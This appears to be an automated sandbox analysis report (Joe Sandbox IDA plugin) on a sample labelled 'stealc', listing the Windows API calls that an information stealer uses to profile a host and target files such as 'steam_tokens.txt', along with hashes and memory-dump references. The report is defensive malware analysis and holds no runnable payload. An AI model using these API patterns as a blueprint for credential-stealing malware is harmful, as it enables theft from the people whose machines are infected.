Part of subcall function 007878E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00786A2B), ref: 00787910
Part of subcall function 007878E0: HeapAlloc.KERNEL32(00000000,?,?,?,00786A2B), ref: 00787917
Part of subcall function 007878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0078792F

Part of subcall function 00787980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00790E00,00000000,?), ref: 007879B0
Part of subcall function 00787980: HeapAlloc.KERNEL32(00000000,?,?,?,?,00790E00,00000000,?), ref: 007879B7
Part of subcall function 00787980: GetLocalTime.KERNEL32(?,?,?,?,?,00790E00,00000000,?), ref: 007879C4
Part of subcall function 00787980: wsprintfA.USER32 ref: 007879F3

Part of subcall function 00787A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00CFF9C0,00000000,?,00790E10,00000000,?,00000000,00000000), ref: 00787A63
Part of subcall function 00787A30: HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,00CFF9C0,00000000,?,00790E10,00000000,?,00000000,00000000,?), ref: 00787A6A
Part of subcall function 00787A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00CFF9C0,00000000,?,00790E10,00000000,?,00000000,00000000,?), ref: 00787A7D

Part of subcall function 00787B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,00CFF9C0,00000000,?,00790E10,00000000,?,00000000,00000000), ref: 00787B35

Part of subcall function 00787B90: GetKeyboardLayoutList.USER32(00000000,00000000,007905AF), ref: 00787BE1
Part of subcall function 00787B90: LocalAlloc.KERNEL32(00000040,?), ref: 00787BF9
Part of subcall function 00787B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 00787C0D
Part of subcall function 00787B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00787C62
Part of subcall function 00787B90: LocalFree.KERNEL32(00000000), ref: 00787D22

Part of subcall function 00787D80: GetSystemPowerStatus.KERNEL32(?), ref: 00787DAD

GetCurrentProcessId.KERNEL32(00000000,?,00CFFF80,00000000,?,00790E24,00000000,?,00000000,00000000,?,00CFF9F0,00000000,?,00790E20,00000000), ref: 0078207E

Part of subcall function 00789470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00789484
Part of subcall function 00789470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 007894A5
Part of subcall function 00789470: CloseHandle.KERNEL32(00000000), ref: 007894AF

Part of subcall function 00787E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00787E37
Part of subcall function 00787E00: HeapAlloc.KERNEL32(00000000), ref: 00787E3E
Part of subcall function 00787E00: RegOpenKeyExA.KERNEL32(80000002,00CF8410,00000000,00020119,?), ref: 00787E5E
Part of subcall function 00787E00: RegQueryValueExA.KERNEL32(?,00CFFFA0,00000000,00000000,000000FF,000000FF), ref: 00787E7F
Part of subcall function 00787E00: RegCloseKey.ADVAPI32(?), ref: 00787E92

Part of subcall function 00787F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00787FC9
Part of subcall function 00787F60: GetLastError.KERNEL32 ref: 00787FD8

Part of subcall function 00787ED0: GetSystemInfo.KERNEL32(00790E2C), ref: 00787F00
Part of subcall function 00787ED0: wsprintfA.USER32 ref: 00787F16

Part of subcall function 00788100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00CFF810,00000000,?,00790E2C,00000000,?,00000000), ref: 00788130
Part of subcall function 00788100: HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00CFF810,00000000,?,00790E2C,00000000,?,00000000,00000000), ref: 00788137
Part of subcall function 00788100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00788158
Part of subcall function 00788100: __aulldiv.LIBCMT ref: 00788172
Part of subcall function 00788100: __aulldiv.LIBCMT ref: 00788180
Part of subcall function 00788100: wsprintfA.USER32 ref: 007881AC

Part of subcall function 007887C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00790E28,00000000,?), ref: 0078882F
Part of subcall function 007887C0: HeapAlloc.KERNEL32(00000000,?,?,?,?,00790E28,00000000,?), ref: 00788836
Part of subcall function 007887C0: wsprintfA.USER32 ref: 00788850

Part of subcall function 00788320: RegOpenKeyExA.KERNEL32(00000000,00CFDBC0,00000000,00020019,00000000,007905B6), ref: 007883A4

Part of subcall function 00788320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00788426
Part of subcall function 00788320: wsprintfA.USER32 ref: 00788459
Part of subcall function 00788320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0078847B
Part of subcall function 00788320: RegCloseKey.ADVAPI32(00000000), ref: 0078848C
Part of subcall function 00788320: RegCloseKey.ADVAPI32(00000000), ref: 00788499

Part of subcall function 00788680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,007905B7), ref: 007886CA
Part of subcall function 00788680: Process32First.KERNEL32(?,00000128), ref: 007886DE
Part of subcall function 00788680: Process32Next.KERNEL32(?,00000128), ref: 007886F3
Part of subcall function 00788680: CloseHandle.KERNEL32(?), ref: 00788761

lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0078265B

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$ComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID:
API String ID: 2204142833-0
Opcode ID: 4544623851c26ac4c32506d07d1236abe3382c1122383fe447e0a77b349fdcdb
Instruction ID: 0d5a33086bc9cb05b4070e794efa69edae9511bde0da86ff0b69afa9e8269d36
Opcode Fuzzy Hash: 4544623851c26ac4c32506d07d1236abe3382c1122383fe447e0a77b349fdcdb
Instruction Fuzzy Hash: AF722E72C54118FAEB1AFB50DC9ADDE7378AF54300F5042AAB51662051EF3C3B4ACB66

Function 00785100 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

Part of subcall function 0078A820: lstrlenA.KERNEL32(00000000,?,?,00785B54,00790ADB,00790ADA,?,?,00786B16,00000000,?,00CF1620,?,0079110C,?,00000000), ref: 0078A82B
Part of subcall function 0078A820: lstrcpy.KERNEL32(y,00000000), ref: 0078A885

lstrlenA.KERNEL32(00000000,00000000,00790ACA,?,?,?,?,?,?,0078610B,?), ref: 0078512A

Strings

steam_tokens.txt, xrefs: 0078513F

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: 9d9b9c884e52f8e9f5e9611f9bc1e1c5fbc02a248ba5c96f2a5b94c3bdc5153e
Instruction ID: e5406ecefd31d508e3072693617ff7d5d0665e44dc8e0b3c82b729477ed678c9
Opcode Fuzzy Hash: 9d9b9c884e52f8e9f5e9611f9bc1e1c5fbc02a248ba5c96f2a5b94c3bdc5153e
Instruction Fuzzy Hash: 84F0FB71990108B6EB08F7A4EC5B9ED733CAB54340F808269B41662492EF3C6619C7A3

Function 00787ED0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00790E2C), ref: 00787F00
wsprintfA.USER32 ref: 00787F16

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 9547bf7ca5f995a7d0d2449a8e8ebc10692478ee9a6c98e05963ed68efd590a6
Instruction ID: 2e66a50aca8bd9c2436e189534e0dd9f127d446a303c242771f5e7488a040739
Opcode Fuzzy Hash: 9547bf7ca5f995a7d0d2449a8e8ebc10692478ee9a6c98e05963ed68efd590a6
Instruction Fuzzy Hash: 6AF062F1954208EBCB14DF85DD45FAAB7BCFB44624F004669F51592280D77959048BD1

Function 0077B4F0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12

Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982

Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905

Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6

Part of subcall function 00779E10: memcmp.MSVCRT(?,v20,00000003), ref: 00779E2D

lstrlenA.KERNEL32(00000000), ref: 0077B9C2
lstrlenA.KERNEL32(00000000), ref: 0077B9D6

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$memcmp
String ID:
API String ID: 3457870978-0
Opcode ID: 9c0dd3bdd5388b5f250563361b92a638cf5b2a9607bb3100dfec23d6e1706d3e
Instruction ID: 0da46383500d4da820d65c97b3ccb3e8f7ea968bc89622435cf9e6a9a71dd747
Opcode Fuzzy Hash: 9c0dd3bdd5388b5f250563361b92a638cf5b2a9607bb3100dfec23d6e1706d3e
Instruction Fuzzy Hash: A9E1CF72950118EAEF15FBA0DD9AEEE7378AF54300F40416AF50666091EF3C7A49CB72

Function 0077AEF0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12

Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982

Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905

lstrlenA.KERNEL32(00000000), ref: 0077B16A
lstrlenA.KERNEL32(00000000), ref: 0077B17E

Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 513945b3b1ac5ad09760df728ba52d39425aace5c4452f27ff3c1a2115c4a9cc
Instruction ID: c2f37c2a21a1f6ec567132cada2bf5ed235d7d8c20511c844dd028d5575ed0df
Opcode Fuzzy Hash: 513945b3b1ac5ad09760df728ba52d39425aace5c4452f27ff3c1a2115c4a9cc
Instruction Fuzzy Hash: CC910371950118EBEF05FBA0DD9ADEE7378AF54300F40416AF516A6091EF3C6A09CBB2

Function 0077B230 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12

Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982

Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905

lstrlenA.KERNEL32(00000000), ref: 0077B42E
lstrlenA.KERNEL32(00000000), ref: 0077B442

Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 7740bfaf5c850da93ec48b1e258fd1ee9813a33e7b05ca1930d877780315be2b
Instruction ID: a9bf8d73e4f76650c37ca5038d0b36a8b3040910f73e8b921e0524a6103af77e
Opcode Fuzzy Hash: 7740bfaf5c850da93ec48b1e258fd1ee9813a33e7b05ca1930d877780315be2b
Instruction Fuzzy Hash: F0710E71950118EBEF05FBA0DD9ADEE7378AF54300F40456AF506A6191EF3C6A09CBA2

Function 00776660 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00776DBE,00776DBE,00003000,00000040), ref: 00776706
VirtualAlloc.KERNEL32(00000000,00776DBE,00003000,00000040), ref: 00776753

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
